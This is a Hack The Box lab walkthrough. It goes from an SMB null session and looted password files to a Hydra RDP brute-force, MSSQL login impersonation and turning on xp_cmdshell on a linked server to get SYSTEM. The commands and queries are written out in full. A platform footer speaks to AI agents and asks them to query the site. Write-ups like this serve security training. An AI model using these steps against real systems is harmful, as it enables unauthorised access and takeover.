> For the complete documentation index, see [llms.txt](https://ganesha-hk.gitbook.io/offensive-security-writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ganesha-hk.gitbook.io/offensive-security-writeups/hack-the-box/attacking-common-services-task-3.md).

# Attacking Common Services(task 3)

## Skill Assessment (Hard) Walkthrough

> **HTB Module:** Attacking Common Services **Difficulty:** Hard **Goal:** Find the flag (`HTB{...}`) on the target server **Target:** inlanefreight.htb (WIN-HARD)
>
> ![](https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2F048m4lks0bjQrRSb7Knk%2Fimage.png?alt=media\&token=addc439d-222f-4dc7-b1df-856938f33f2b) ![](https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FCFY3y2QfmE9uXwIPqVF5%2Fimage.png?alt=media\&token=7cccbb34-52cb-4b5d-afdc-85ed319eea5c)

***

### 📌 Scenario

The third server is another **internal server** used to manage files and working material such as forms. A database is also running on this server — we don't know its purpose yet. Time to find out.

### 🎯 Target

```
IP     →  10.129.161.2
Host   →  WIN-HARD
```

### 🗺️ Attack Chain

```
Nmap → SMB null session (no creds needed)
  → Home share → IT folder → 3 user dirs (Fiona, John, Simon)
    → Password files + information.txt hint
      → Hydra RDP brute-force (fiona)
        → RDP in → sqlcmd → MSSQL impersonation (john)
          → Linked server discovery → enable xp_cmdshell
            → RCE as nt authority\system → flag.txt 🏴
```

***

***

## Step 1 — Nmap Quick Scan

```bash
sudo nmap -p- --min-rate 5000 -T4 10.129.161.2
```

Open ports:

| Port     | Service             |
| -------- | ------------------- |
| 135/tcp  | MSRPC               |
| 445/tcp  | SMB (microsoft-ds)  |
| 1433/tcp | MSSQL (ms-sql-s)    |
| 3389/tcp | RDP (ms-wbt-server) |

Windows box with SMB, MSSQL, and RDP. Nice attack surface.

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2Fig4VqizTzfxTNxqJxU6N%2Fimg-000.png?alt=media&amp;token=7f63053e-2428-41d7-8926-dc8a2c6755ea" alt=""><figcaption></figcaption></figure>

> 📸 **Image 1** — Nmap quick full port scan showing 135, 445, 1433, 3389 open

***

## Step 2 — Nmap Service Scan

```bash
sudo nmap -p135,445,1433,3389 -sC -sV 10.129.161.2
```

Key details:

| Port     | Service / Version                                 |
| -------- | ------------------------------------------------- |
| 135/tcp  | Microsoft Windows RPC                             |
| 445/tcp  | microsoft-ds (SMB)                                |
| 1433/tcp | **Microsoft SQL Server 2019 RTM** (15.00.2000.00) |
| 3389/tcp | Microsoft Terminal Services (RDP)                 |

Hostname: **WIN-HARD**, SMB signing enabled but **not required**.

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FcZ3Q4zQAkmQCDCT3wI96%2Fimg-001.png?alt=media&amp;token=5b87937c-9e37-4c94-9be0-0c536012c54a" alt=""><figcaption></figcaption></figure>

> 📸 **Image 2** — Nmap service scan showing MSSQL 2019, RDP, NTLM info (WIN-HARD hostname)

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FiXkSXSJaOG0G8G0ToVAR%2Fimg-002.png?alt=media&amp;token=b2d6f688-63d2-4b9d-b071-db3699d4452f" alt=""><figcaption></figcaption></figure>

> 📸 **Image 3** — Nmap service scan continued — SQL Server 2019 RTM details, RDP cert info, SMB2 signing enabled but not required

***

## Step 3 — SMB Null Session — Listing Shares

No creds? No problem. Try a null session:

```bash
smbclient -L //10.129.161.2/
# Password: (just press enter)
```

Shares found:

```
ADMIN$    Disk    Remote Admin
C$        Disk    Default share
Home      Disk    
IPC$      IPC     Remote IPC
```

The `Home` share is accessible! 👀

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FOC7xL48psKww5ws56CY5%2Fimg-003.png?alt=media&amp;token=32261347-6e46-422a-b91b-4c5c74073354" alt=""><figcaption></figcaption></figure>

> 📸 **Image 4** — smbclient null session listing shares — `Home` share accessible without creds

***

## Step 4 — SMB Enumeration — IT Folder & User Directories

Connect to the `Home` share and dig around:

```bash
smbclient //10.129.161.2/Home
# Password: (blank)
```

Inside `\IT\` there are three user directories:

```
smb: \IT\> dir
Fiona     D    Fri Apr 22 01:41:53 2022
John      D    Fri Apr 22 02:45:09 2022
Simon     D    Fri Apr 22 02:46:07 2022
```

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FrLQbd3zWGDbUBfzmWqn7%2Fimg-004.png?alt=media&amp;token=3bd4fc47-fe8b-435e-b644-a49a3dea12eb" alt=""><figcaption></figcaption></figure>

> 📸 **Image 5** — SMB browsing `\IT\` directory showing three user folders: Fiona, John, Simon

***

## Step 5 — Downloading Files from Each User

**Fiona's directory:**

```
smb: \IT\Fiona\> dir
creds.txt    A    118    Fri Apr 22 01:43:11 2022

smb: \IT\Fiona\> get creds.txt
```

**John's directory:**

```
smb: \IT\John\> dir
information.txt    A    101    Fri Apr 22 02:44:58 2022
notes.txt          A    164    Fri Apr 22 02:43:40 2022
secrets.txt        A     99    Fri Apr 22 02:45:55 2022

smb: \IT\John\> get information.txt
smb: \IT\John\> get notes.txt
smb: \IT\John\> get secrets.txt
```

**Simon's directory:**

```
smb: \IT\Simon\> dir
random.txt    A    94    Fri Apr 22 02:46:48 2022

smb: \IT\Simon\> get random.txt
```

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FNVzhNPw5vhWHUe1W7QhO%2Fimg-005.png?alt=media&amp;token=51531673-ef68-4a05-bba9-52afebcde560" alt=""><figcaption></figcaption></figure>

> 📸 **Image 6** — SMB downloading `creds.txt` from Fiona, then browsing John's directory (information.txt, notes.txt, secrets.txt)

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FajqBz67XizKPLqmVKcsa%2Fimg-006.png?alt=media&amp;token=dddc590e-0406-4540-8050-baeeb7d28f6a" alt=""><figcaption></figcaption></figure>

> 📸 **Image 7** — SMB browsing Simon's directory containing `random.txt`

***

## Step 6 — The Hint: information.txt

```bash
cat information.txt
```

```
To do:
- Keep testing with the database.
- Create a local linked server.
- Simulate Impersonation.
```

This tells us exactly what to look for later: **linked servers** and **impersonation** in MSSQL. 🧠

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FzG4OfwBPyf81Ep3XTR7U%2Fimg-007.png?alt=media&amp;token=3cfac5f2-9dde-4234-b41d-e82bca1d305f" alt=""><figcaption></figcaption></figure>

> 📸 **Image 8** — Contents of `information.txt` — hints about linked server and impersonation

***

## Step 7 — Combine Password Files & Brute-Force RDP

Combine all three password files into one wordlist:

```bash
cat creds.txt secrets.txt random.txt > combined_passwords.txt
```

Brute-force RDP with user `fiona`:

```bash
hydra -I -l fiona -P creds.txt -s 3389 -f 10.129.161.2 rdp
```

**Hit!** 🎯 Hydra finds valid RDP creds for `fiona`.

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FJjNmJRMtjtrIpShxRD42%2Fimg-008.png?alt=media&amp;token=bbc705b7-f39b-4c15-ad1d-2d51bc3f9e9d" alt=""><figcaption></figcaption></figure>

> 📸 **Image 9** — Hydra RDP brute-force finding valid credentials for `fiona`

***

## Step 8 — RDP Login & MSSQL Access via sqlcmd

RDP in as fiona:

```bash
xfreerdp /v:10.129.161.2 /u:fiona /p:'<password>' /cert:ignore
```

On the Windows desktop, open `cmd` and launch `sqlcmd` to connect to the local MSSQL instance:

```cmd
sqlcmd
```

We're connected to MSSQL as fiona.

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FjkLoLirLiuL3MO8UBZF2%2Fimg-009.png?alt=media&amp;token=311765c2-cd9b-4956-b5c2-32afd285fc36" alt=""><figcaption></figcaption></figure>

> 📸 **Image 10** — RDP session on WIN-HARD as Fiona, running `sqlcmd` in Command Prompt

***

## Step 9 — MSSQL Impersonation

Check who we can impersonate:

```sql
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
go
```

Result: we can impersonate **john** and **simon**.

Impersonate as john:

```sql
execute as login = 'john'
go
SELECT SYSTEM_USER
go
```

Confirmed — we're now running as `john`.

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FUC9Vpt80HnaxSB0FIs8J%2Fimg-010.png?alt=media&amp;token=c189890d-3b6f-4471-8035-18bdac334085" alt=""><figcaption></figcaption></figure>

> 📸 **Image 11** — sqlcmd querying IMPERSONATE permissions → john and simon available, then impersonating as john

***

## Step 10 — Linked Server → xp\_cmdshell → Flag

Remember the hint: *"Create a local linked server"*. Let's check for linked servers:

```sql
SELECT srvname, isremote FROM sysservers
go
```

Found:

```
WINSRV02\SQLEXPRESS       (remote = 1)
LOCAL.TEST.LINKED.SRV     (remote = 0)
```

`LOCAL.TEST.LINKED.SRV` is a local linked server! Enable `xp_cmdshell` on it:

```sql
EXECUTE('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [LOCAL.TEST.LINKED.SRV]
go
EXECUTE('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [LOCAL.TEST.LINKED.SRV]
go
```

Test RCE — `whoami`:

```sql
EXECUTE('EXEC xp_cmdshell ''whoami'';') AT [LOCAL.TEST.LINKED.SRV]
go
```

```
nt authority\system
```

We're **SYSTEM** on the linked server! 🔥 Now grab the flag:

```sql
EXEC ('xp_cmdshell ''type C:\Users\Administrator\Desktop\flag.txt''') AT [LOCAL.TEST.LINKED.SRV]
go
```

```
HTB{46xxxxxxxxxxxxxxx}
```

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FcS3lyyjwLaYdTxh6H5Id%2Fimg-011.png?alt=media&amp;token=49f8a870-a5e7-4464-b1e1-330ca8407a97" alt=""><figcaption></figcaption></figure>

> 📸 **Image 12** — Linked server discovery, enabling xp\_cmdshell, whoami returns `nt authority\system`, reading flag.txt → `HTB{46u$!n9_l!nk3d_$3rv3r$}`

***

## 🏆 Pwned!

SMB null session → password files → RDP brute-force → MSSQL impersonation → linked server xp\_cmdshell → SYSTEM shell → flag.

#### Tools Used

| Tool        | Purpose                                      |
| ----------- | -------------------------------------------- |
| `nmap`      | Port scanning & service detection            |
| `smbclient` | SMB null session enumeration & file download |
| `hydra`     | RDP brute-force                              |
| `xfreerdp`  | RDP access                                   |
| `sqlcmd`    | MSSQL client (impersonation + linked server) |

***

> **GG 🏴** — SMB null session → password files → RDP → MSSQL impersonation → linked server xp\_cmdshell → SYSTEM.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ganesha-hk.gitbook.io/offensive-security-writeups/hack-the-box/attacking-common-services-task-3.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
